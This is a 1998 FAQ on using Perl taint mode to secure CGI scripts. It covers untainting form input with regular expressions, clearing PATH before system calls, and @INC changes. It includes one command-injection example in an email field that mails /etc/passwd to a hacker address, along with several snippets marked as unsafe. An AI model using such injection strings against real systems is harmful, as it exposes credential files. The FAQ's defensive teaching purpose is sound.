CGI/Perl Taint Mode FAQ

Gunther Birznieks <gunther@clark.net>
Version 1.0, June 3, 1998

Table of Contents

What is taint mode? Why do I need it?

How do I use taint mode in my CGI/Perl script?

How do I activate taint mode on non-UNIX servers?

Once I activate taint mode is that it?

OK, so what are the details of what I need to change?

Do I have to untaint all my variables?

If I "know" my variable is safe, why don't I just clear taint mode?

How do I fix system() calls in taint mode?

How do I fix problems with require or use statements in taint mode?

Some more taint mode tips.

Acknowledgements.

What is taint mode? Why do I need it?

Freeware CGI Scripts are available for download all over the Web. But how many of them are really secure? When you download a script do you check all the logic to make sure it is secure? Do you read through each line of code and anticipate all the ramifications? Most of the time the answer is "no". After all, the whole point of downloading software is to get it and run it for free WITHOUT having to do a lot of work.
I'm writing this to tell you that there isn't any free lunch out there. The more complicated a CGI script is, the more likely you will want to find someone else who has already programmed it and avoid doing the work yourself.
The problem is that regardless of how good the author is, every large program has a good probability of having bugs -- some of them may be security bugs.
One very good way to lock out security bugs in Perl code is to turn on TAINT mode. TAINT mode puts a Perl script into "PARANOID" mode and treats ALL user supplied input as tainted and bad unless the programmer explicitly "OKs" the data.

How do I use taint mode in my CGI/Perl script?

If your site has Perl 5 on it, change the line at the top of your CGI script from

#!/usr/local/bin/perl

to

#!/usr/local/bin/perl -T

Note: your path to the Perl executable may vary depending on your server.
If your site has Perl 4 on it, change the line at the top of your CGI script from

#!/usr/local/bin/perl

to

#!/usr/local/bin/taintperl

Notice that Perl 4 does not support the -T flag. Instead, Perl 4 distributions typically come with a separate executable altogether, "taintperl".

Windows NT and other non-UNIX Web servers may have trouble recognizing the first magical line of a Perl script. Executing the first line of a script with the command parameters in there is a UNIXism. Read the next section for issues involved in activating taint mode on WinNT, Win95/98, or Mac.

How do I activate taint mode on non-UNIX servers?

CGI Scripts running on non-UNIX Servers typically do not recognize the magical #!/usr/local/bin/perl first line of the script. Instead, the web server knows what language to execute the script with because of an operating system or web server configuration variable.
For example, for IIS on NT, you should change the association of Perl scripts to run with taint mode on. Unfortunately, this changes the association for ALL your Perl scripts which you may not want.
A more reasonable way is to get around the problem by creating a second extension under NT such as tcgi or tgi and associate it with taint mode Perl. Then, rename the scripts with the new extension to activate taint mode on them.
You could also try using another web server that understands the first line of scripts. For example, SAMBAR v4.1, a freeware NT web server, can be configured to run the script based on the first line of the CGI script. In this case, you would change the first line to read something like the following:

#!c:\perl\bin\perl.exe -T

Once I activate taint mode is that it?

Unfortunately, no.
You should test your script thoroughly to see if turning on taint mode stops anything from occurring. Usually the majority of your script will work fine. In fact, if you are lucky, the whole program may work without any changes at all!
The major caveat is that taint mode is not a compile time check. It is a run-time check.
Run-time checking means that taint mode Perl is constantly and vigilantly checking to see if the script is going to do anything unsafe with user input while the program runs. It does not stop checking after the script first compiles (compile-time checking).
Run-time checking means that you need to test all logical paths of execution your script might take so that "legal operations" do not get halted because of taint mode.
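Because the checks happen while the script runs, it can help to print what Perl currently regards as tainted while you exercise each path. The following is a minimal sketch, not part of the original scripts: the helper names taint_mode_label and describe_value are hypothetical, and it assumes Perl 5.8 or later (for the ${^TAINT} variable and the Scalar::Util module).

```perl
use strict;
use warnings;
use Scalar::Util qw(tainted);

# ${^TAINT} is 1 under -T, -1 under -t (warnings only), and 0 otherwise.
sub taint_mode_label {
    return ${^TAINT} > 0 ? "enforcing"
         : ${^TAINT} < 0 ? "warn-only"
         :                 "off";
}

# Describe one value. tainted() always returns false when taint mode is off.
sub describe_value {
    my ($name, $value) = @_;
    return sprintf "%s is %s", $name,
        tainted($value) ? "tainted" : "not tainted";
}

print "taint mode: ", taint_mode_label(), "\n";
print describe_value('a literal string', 'hello'), "\n";
print describe_value('$ENV{PATH}', $ENV{PATH}), "\n";
```

Run with the -T flag, the last line should report the environment variable as tainted; without -T, nothing is ever reported as tainted.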

OK, so what are the details of what I need to change?

To get an introduction to some basic cases of what taint mode considers "unsafe", I recommend reading the Perl documentation on taint mode.
The O'Reilly "Programming Perl" reference book is a good introductory source of information. The section in the book is called "Handling Insecure Data".
The same basic information in there can also be found on-line in the UNIX distribution of Perl. On UNIX, typing "perldoc perlsec" will bring up the Perl Security documentation.
If you are not using UNIX, there is a possibility that this command will work on your particular operating system's distribution of Perl anyway. However, if it does not work, you can always look up this information on-line. The "perlsec" guide is located at http://www.perl.com/CPAN/doc/manual/html/pod/perlsec.html.
In addition, Lincoln Stein's WWW-Security FAQ has an excellent introduction to safe scripting in Perl.
On a CGI script, the only user input is basically user submitted form data. It is this user input that the Perl script will consider "tainted".
This does NOT mean that you have to immediately jump through a lot of hoops to untaint ALL the form variables that come in. Not only would that be a big pain, but it's unnecessary.
Instead, Perl only considers the COMBINATION of form variables plus the use of a potentially "unsafe" operation to be illegal. Potentially "unsafe" operations are operations that have a potentially permanent destructive effect if the wrong parameters are passed.
Potentially unsafe operations include, but are not necessarily limited to, system calls of any sort such as using system(), backticks or piped open() calls, open calls that can write to disk, unlink() which deletes files, and rename().

For the sample code given, it is assumed that the associative array %form_data contains the form data that was passed to the CGI script where the key is the field name and the value is the value of the HTML Form field.
Since this FAQ is meant to be useful for both Perl 4 and 5, I have not used CGI.pm syntax. If you are using Perl 5 and CGI.pm as your library, your tainted variables would be coming out of $query->param() method in the CGI object.
I use "mail" as an example program, but really the examples here apply to any system call with command line parameters. If you actually want to email from CGI scripts you may want to consider the more secure method described further in the system call section of this FAQ.

For example, if $form_data{"email"} is "tainted", then the following would still be legal:

print $form_data{"email"} . "\n";

because the print command is not an unsafe operation.
But if you try to pass the same variable to an unsafe version of a system call

system("mail " . $form_data{"email"});

Perl will complain and not allow this. Making an unsafe system call plus passing form data as a command line argument is terribly unsafe. Consider what would happen if someone entered an email address on the form like

"me@mydomain.com; mail hacker@hack.net < /etc/passwd"

Clearly, there are security ramifications. With taint mode turned on though, the Perl interpreter will stop this from occurring at all. However, Perl can't tell what is in the %form_data variable -- it just assumes it is tainted whether it is friendly or not.
Thus, if you want to do that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. Remember, Perl only sees that the string was created as a result of user input (such as a form variable). It has no way of knowing whether the string is safe or not until you untaint it with the techniques listed here.

Even HIDDEN form tags which are not directly entered by a user are considered tainted by Perl. In other words, all form data passed to the CGI script is considered tainted by Perl.

To untaint a variable, you use regular expressions.
The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. In Perl, the first () group match gets assigned to $1, the second () group to $2, and so on.
Perl considers these new variables that arise from () groups to be untainted. Once your regular expression has created these variables, you can use them as your new untainted values.
The following will illustrate this:
EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. So we want to match this descriptive template. But there is a catch!
Email addresses may contain dashes, but a lot of programs use a leading dash to signify a command-line parameter! So although we allow dashes in the email address, if you want to be extra careful, make sure that the first character of the email address is a word character and not a dash or period. The likelihood that someone really has an email address that begins with a period or dash is relatively low unless they are the singer formerly known as Prince.
Thus, our descriptive template becomes the following:

Match first character as a word character, no extra ones allowed like dashes.
Match 0 or more subsequent characters as word characters which can also include dashes and periods.
Match a single @ symbol after the preceding two rules.
Match every character (at least one) for the domain name of the email server after the @ symbol. This can consist of word characters, dashes, and periods.

The regular expression for this template minus the grouping () we would use for untainting is:

/\w{1}[\w-.]*\@[\w-.]+/

Further, let us assume that somewhere in the program a variable called $email has been assigned from $form_data{"email"} which contains a value submitted by the user from an HTML form using a statement like the following:

$email = $form_data{"email"};

Notice that $email is now tainted as well. This is because its value arose directly from another variable that contained tainted (user input) data, namely $form_data{"email"}.
So to untaint a variable called $email, you would do the following with a regular expression.

if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
    $email = "$1\@$2";
} else {
    warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email");
    $email = ""; # successful match did not occur
}

OK. Let's go over this in a little more detail.
Basically, when you use () inside a regular expression, each group of parentheses is mapped to a numbered variable: $1 for the first group, $2 for the second, and so on. For example, the first set of parentheses that matches in the regular expression is referred to as $1.
In the above example, the first set of parentheses surrounds (\w{1}[\w-.]*). This matches exactly one word character (no dashes or periods allowed) followed by zero or more word characters, dashes, and periods. Because of the parentheses, this first match gets assigned to $1 by Perl.
Then, an @ symbol is matched.
Finally, the second set of parentheses ([\w-.]+) matches one or more of any word characters, dashes, and periods. This second match gets assigned to $2 by Perl.
If the regular expression is successful, $1 (first parenthetical match) will equal the username portion of the email address and $2 (second parenthetical match) will equal the domain portion.
Thus, the next command, $email = "$1\@$2"; replaces the previously tainted email variable with the safe counterparts: $1 followed by an @ symbol followed by $2.
Notice that $1 and $2 are both considered untainted now. This is very important to see.
Yes, they did arise from the user input data, but Perl considers these variables special. Perl basically believes that because they resulted from a regular expression you set up, that you have explicitly checked the data for validity in that regular expression. Thus, $1 and $2 are not considered tainted.
On the other hand, if the user entered an email address that did not match this "template", $1 and $2 will equal nothing because the regular expression will have failed. The example above would assign $email = "" in this case as part of the else {} clause.
Of course, if the user is trying to hack your system, this is a good thing. You only want valid email addresses to come through. You should generally check for the failure of the regular expression as was done above by the else {} clause and do something about the bad data.
As an additional plus, checking for the failure of the regular expression allows you to use something like warn to print an informational message to STDERR about the variable that did not pass along with the IP address that tried to pass it as I have done in the above example.
When a CGI script prints to STDERR, that output goes to your errorlog. You should always check your errorlog for potential hack attempts. Of course, you could always be more sophisticated, such as having the script email the bad data directly to you so you would be notified right away. Also, if you are really worried about your program's integrity, you could use die() instead of warn() to stop the program rather than quietly warning you.
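The steps above can be wrapped in a small helper. This is a sketch under stated assumptions rather than the FAQ's own code: the name untaint_email is hypothetical, and the pattern is a slightly stricter variant of the one above. It adds the \A and \z anchors so that the whole string must fit the template (the unanchored pattern would accept the safe-looking part of a longer string), and it writes the hyphen last in each character class so Perl reads it as a literal character.

```perl
use strict;
use warnings;

# Hypothetical helper: returns a checked copy of the address, or undef.
sub untaint_email {
    my ($raw) = @_;
    return unless defined $raw;
    # \A and \z force the template to cover the entire string.
    if ($raw =~ /\A(\w[\w.-]*)\@([\w.-]+)\z/) {
        return "$1\@$2";    # built only from the captured groups
    }
    return;                 # undef in scalar context: no match
}

for my $candidate ('me@mydomain.com',
                   'me@mydomain.com; mail hacker@hack.net < /etc/passwd',
                   '-f@mydomain.com') {
    my $clean = untaint_email($candidate);
    print defined $clean ? "accepted: $clean\n" : "rejected: $candidate\n";
}
```

A caller would then log or refuse the request whenever the helper returns undef, in the same way as the else {} clause shown earlier.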

If you are doing more than one taint check and a later check fails, the numbered variables (e.g. $1 or $2) will keep the values they had from the previous successful match.
Unless you are sure that this is the only variable you are taint checking, it is best to check the match with an IF/ELSE statement as demonstrated above.
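The leftover-value problem is easy to reproduce. The sketch below is illustrative only; the sample inputs and the helper name capture_or_undef are hypothetical. It first shows $1 surviving a failed match, then a list-assignment form that yields undef on failure instead.

```perl
use strict;
use warnings;

# First match succeeds, so $1 is set.
my $matched = 'alice' =~ /\A(\w+)\z/;
my $first   = $1;

# Second match fails, and $1 is left exactly as it was.
my $matched_again = '!!!' =~ /\A(\w+)\z/;
my $stale         = $1;

print "after the failed match, \$1 is still '$stale'\n";

# In list context a failed match returns an empty list,
# so $clean ends up undefined rather than stale.
sub capture_or_undef {
    my ($input) = @_;
    my ($clean) = $input =~ /\A(\w+)\z/;
    return $clean;
}

print defined capture_or_undef('!!!') ? "got a value\n" : "no value\n";
```

Either approach works as long as the result of the match is actually checked before $1 is used.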

Do I have to untaint all my variables?

No.
Both of the following must happen before you have to worry about untainting a variable.
[1] The variable was assigned based on user input. Or the variable was assigned from a variable that was tainted itself.
AND
[2] The variable will be used in a way that could compromise system safety such as writing a file.
For example, the following is OK because printing to the STDOUT is not an unsafe operation even though the variable came from a form variable.

# %form_data contains an associative array
# of values the user entered on a form
#
# This is SAFE, printing is a safe operation
# regardless of user input or not.
#
$filename = $form_data{"session_file"};
print "The filename was $filename\n";

In addition, the following is OK, because although the file is being opened for writing (a potentially unsafe operation), the filename variable was assigned within the program NOT as a result of user input.

# SAFE, FILENAME is assigned in the program itself
$filename = "./TempFiles/mytempfile.dat";
open (TEMP, ">$filename");

However, the following IS unsafe because the variable came from user input AND it is being used in a potentially unsafe operation -- opening a file for writing.
Note, opening a file for writing is unsafe because if the filename is corrupt, then the user input could tell the script to write over ANY file in the system which is a huge security hole.

# UNSAFE!!! Taint Will Complain!
$filename = $form_data{"session_file"};
open (SESSION, ">$filename");

The easiest way to test if taint mode is having a problem with a particular form variable is to simply activate taint mode as described earlier and then test the program.
Any errors that result in the script not executing will be caught and logged in your web server's errorlog. This should be the number one place you look at to troubleshoot taint mode.
Here are some common unsafe operations which will stop the Perl program from executing if user input used with them is not untainted first:

Unsafe System() calls (discussed as a special case below).
Require()ing library files
Anything that writes to the file system such as open with > or >>, unlink, rename
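For the file-writing case, the same regular expression technique applies to the filename. Here is a minimal sketch, assuming session files are bare names with no directory part; the helper name untaint_filename and the ./TempFiles directory are illustrative assumptions, not requirements.

```perl
use strict;
use warnings;

# Hypothetical helper: accept only a bare file name, or return undef.
sub untaint_filename {
    my ($raw) = @_;
    return unless defined $raw;
    # The first character must be a word character; the rest may also
    # include periods and dashes. Slashes are never allowed, so the
    # name cannot point outside the directory chosen by the program.
    return unless $raw =~ /\A(\w[\w.-]*)\z/;
    return $1;
}

my $session_dir = './TempFiles';    # assumption: chosen by the program

for my $candidate ('session42.dat', '../../etc/passwd', 'a.dat; echo hi') {
    my $name = untaint_filename($candidate);
    if (defined $name) {
        # A real script would now open "$session_dir/$name" for writing.
        print "would write to $session_dir/$name\n";
    } else {
        print "refused: $candidate\n";
    }
}
```

Keeping the directory fixed in the program and accepting only the final name component from the form keeps the user from steering the write elsewhere.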

If I "know" my variable is safe, why don't I just clear taint mode?

DON'T DO THIS!!!
Perl probably has a good reason for thinking the input is unsafe. For example, there is a common misconception that HIDDEN INPUT tags on a FORM that are generated by a CGI script are "safe". This is not true! A user could easily mimic your form by making their own HTML form with bogus values.
Taint mode will catch all this. Avoid the temptation to quickly dismiss a tainted variable by using an "open" Regular expression.
THE FOLLOWING IS BAD AND SHOULD NOT BE DONE:

$email =~ /(.*)/; $email = $1;

This will match ANY expression. Thus, effectively no check has actually been done.
Recall that Perl considers $1 to be safe now because it trusts that you tested the validity of the variable using the regular expression. Perl does not judge your regular expression. If you choose to make it too loose like the above regular expression, then Perl will let you.
If you do this, you are shortchanging the point of taint mode, which is to make you sit down and think "What input do I really want and how do I restrict myself to JUST that set of characters?".

How do I fix system() calls in taint mode?

When you make a system call to an external program or use its sister command, exec, taint mode also stops this from happening if the PATH has not been adjusted. Again, since a string is being passed to the system call, Perl generally has trouble figuring out whether a relative or absolute path to a command has been passed. Being in "paranoid" mode, Perl stops the command from executing.
The way around this problem is to clear the PATH environment variable so that Perl can trust that the command passed as a system call is an absolute path to a command instead of being part of the search path.
You might ask "What is unsafe about the path?". Historically, paths are considered unsafe because if there are multiple versions of an executable, it is difficult to tell which one is actually being executed. If there is a bug in one of the versions, then this can pose a security hazard.
Basically, before doing a system call, clear the PATH by issuing a statement like the following

$ENV{"PATH"} = "";

Note, this does not just apply to the system() call. It also applies to opening up files with the | symbol (which executes a command) or using backticks `` to execute an external command. Of course, now you will need to call the command using an absolute path.
By the way, some system calls are more secure than others. The example given before, system("mail $email"), is insecure. Behind the scenes, Perl takes a single string argument to system() and passes it to a shell for parsing if there are any shell interpretable meta characters.
But system("mail", $email) is secure because it does not spawn a shell to execute the command. The reason it does not spawn a shell is that each argument has been preprocessed by the programmer into separate strings. Thus, Perl does not bother passing the string to a shell for processing, and the $email variable will not have a chance of being executed as a command as part of the shell processing step.

I strongly advise untainting the variables passed to system() even if you use the "safer" separated arguments version of the system() call.
It is entirely possible that the program you are calling via a system() call actually calls other programs or uses the data passed to it in an unsafe way. In turn those programs may call other programs very much like the Russian dolls that expose yet another doll every time one is opened.
It doesn't take much extra coding to untaint variables and be "safe rather than sorry".
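The pieces of this section (an empty PATH, an absolute path to the command, and separate arguments) can be combined in one helper. This is a sketch under assumptions: the name run_without_shell is hypothetical, /bin/echo merely stands in for a real program such as mail, and the list form of a piped open used here needs Perl 5.8 or later on UNIX-like systems.

```perl
use strict;
use warnings;

# Hypothetical helper: run a program by absolute path without a shell
# and return whatever it wrote to standard output.
sub run_without_shell {
    my ($program, @args) = @_;
    die "program must be an absolute path: $program\n"
        unless $program =~ m{\A/};

    # Empty PATH for the duration of this call only. The perlsec guide
    # additionally removes IFS, CDPATH, ENV and BASH_ENV from %ENV.
    local $ENV{PATH} = '';

    # The list form hands each argument to the program as-is,
    # so no shell ever parses them.
    open(my $out, '-|', $program, @args)
        or die "cannot run $program: $!\n";
    local $/;                       # read all of the output at once
    my $text = <$out>;
    close($out) or die "$program exited with status $?\n";
    return $text;
}

# The hostile-looking address is echoed back as plain text, not executed.
if (-x '/bin/echo') {
    print run_without_shell('/bin/echo', 'me@mydomain.com; echo injected');
}
```

Even with this in place, the arguments should still be untainted first, for the reasons given in the note above.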

Another quick security note. Typically instead of passing $email as a parameter to mail, it is more secure to open up a pipe to the sendmail program with a "-t" parameter. This makes sendmail accept the To: and From: email addresses as STDIN instead of command line parameters. The mail-lib.pl library from the Selena Sol Scripts Archive uses this more secure method of sending email.
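A rough sketch of the sendmail approach follows. It is not the mail-lib.pl code: the function names build_message and send_message are hypothetical, and /usr/lib/sendmail is only an assumed location that varies between servers. The sketch also refuses header values that contain a line break, since such a value could otherwise add headers of its own.

```perl
use strict;
use warnings;

# Build the text handed to "sendmail -t" on its standard input.
sub build_message {
    my (%arg) = @_;
    for my $field (qw(to from subject)) {
        die "missing or multi-line $field\n"
            if !defined $arg{$field} || $arg{$field} =~ /[\r\n]/;
    }
    my $body = defined $arg{body} ? $arg{body} : '';
    return "To: $arg{to}\n"
         . "From: $arg{from}\n"
         . "Subject: $arg{subject}\n"
         . "\n"
         . "$body\n";
}

# Assumption: sendmail lives at /usr/lib/sendmail; adjust for your server.
sub send_message {
    my ($message) = @_;
    local $ENV{PATH} = '';
    # -t makes sendmail read the recipients from the message headers,
    # so no address ever appears on the command line.
    open(my $mail, '|-', '/usr/lib/sendmail', '-t')
        or die "cannot start sendmail: $!\n";
    print {$mail} $message;
    close($mail) or die "sendmail exited with status $?\n";
    return 1;
}

# Only the message text is printed here; nothing is sent.
print build_message(
    to      => 'me@mydomain.com',
    from    => 'webmaster@mydomain.com',
    subject => 'Form feedback',
    body    => 'Thanks for writing.',
);
```

A script would call send_message(build_message(...)) after untainting each address with a pattern like the one shown earlier.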

How do I fix problems with require or use statements in taint mode?

The Perl require and use statements also change slightly when taint mode is turned on. Basically, the search path used to load libraries and modules no longer contains "." (the current directory).
So if you load any libraries or modules relative to the current working directory without explicitly specifying the path, your script will break under taint mode.
To further illustrate this, normally you can read a setup file in the current working directory in a CGI script with a command like:

require "myscript.setup";

However, this will not work when taint mode is on. Instead, you must tell the require statement explicitly where to load the library since "." is removed during taint mode from the @INC array.
@INC contains a list of valid paths to read library files and modules from.
If taint mode is on, you would simply change the above require code to the following:

require "./myscript.setup";

This lets Perl know that the myscript.setup will be explicitly loaded from the current directory. Alternatively, you could add the following command:

use lib qw(.);

"use lib" tells Perl to add the list of passed directory names inside qw() to the @INC array.
You may be wondering why I advocate adding the capability of loading relative libraries back into the script when taint mode is turned on. After all, isn't taint mode doing this to protect me? What is taint mode protecting?
Well, the issue with @INC is really more of a problem with SUID scripts than CGI scripts. When you have an SUID script that can execute with the permissions of another user (such as root), Perl goes into taint mode automatically.
For this SUID script case, it would be a huge security breach to have the capability of loading libraries from the user's current directory. If a script ends up having a bug where the library is not found in the normal directory path, then a user could exploit this by writing their own, malicious version of the library, putting it in the current directory, and running the SUID script from their current directory.
However, this is not really the same problem with CGI scripts. Users are not executing your script from arbitrary directories. Your web server controls which directory the script is called from. So keeping "." in @INC is not really a problem compared to SUID scripts which operate under taint mode automatically.
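If you would rather not rely on the current directory at all, "use lib" also accepts an absolute directory. The sketch below is only an illustration: /home/httpd/cgi-lib is a made-up path standing in for wherever your own library files live, and the directory does not need to exist for the sketch to run.

```perl
use strict;
use warnings;

# Hypothetical directory holding the script's own libraries.
use lib '/home/httpd/cgi-lib';

# "use lib" puts its directories at the front of @INC.
print "first entry of \@INC: $INC[0]\n";

# Check whether the current directory is still searched implicitly.
my $has_dot = grep { $_ eq '.' } @INC;
print $has_dot ? "\".\" is in \@INC\n" : "\".\" is not in \@INC\n";
```

With this in place, a plain require "myscript.setup"; would be looked up in the named directory first, wherever the web server happens to start the script.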

Some more taint mode tips

[1] Consider logging bad taint/regular expression matches.
If your taint cleaning results in a bad regular expression match, you might want to set up code to detect this and log it or email this fact to you. That way, you can see if people are trying to hack your script.
[2] Use the web server's errorlog.
If you turn on taint mode and a problem occurs so that the script does not seem to work, you can find out the specifics behind the problem by examining your server's errorlog. Encourage your ISP to help you secure your scripts by giving you access to errorlogs if you don't have it.
A smart ISP will encourage safe CGI scripting practices. If they don't, you don't want that ISP since other users may be developing unsafe CGI on your virtual web server.
[3] There's more to safe CGI scripting than taint mode.
Always be vigilant. There may be other holes. For example, the "Russian Doll" scenario that I outlined above could get past taint mode.
Taint mode helps a LOT, but it is not the end of safe CGI scripting. Always ask yourself, "Is there a way someone could break through this?"
[4] Read other WWW Security references.
Read the WWW-Security FAQ by Lincoln Stein and other security resources. Keeping up with the latest security issues is absolutely crucial to promoting safe CGI.

Acknowledgements

The following have helped with the creation of this FAQ by providing valuable feedback during its development: Anthony Masiello, Joseph Ryan, Ignacio Bustamante, Fred Taheri, Mark McDonald, Dan Berkowitz, Peter Chines, Selena Sol.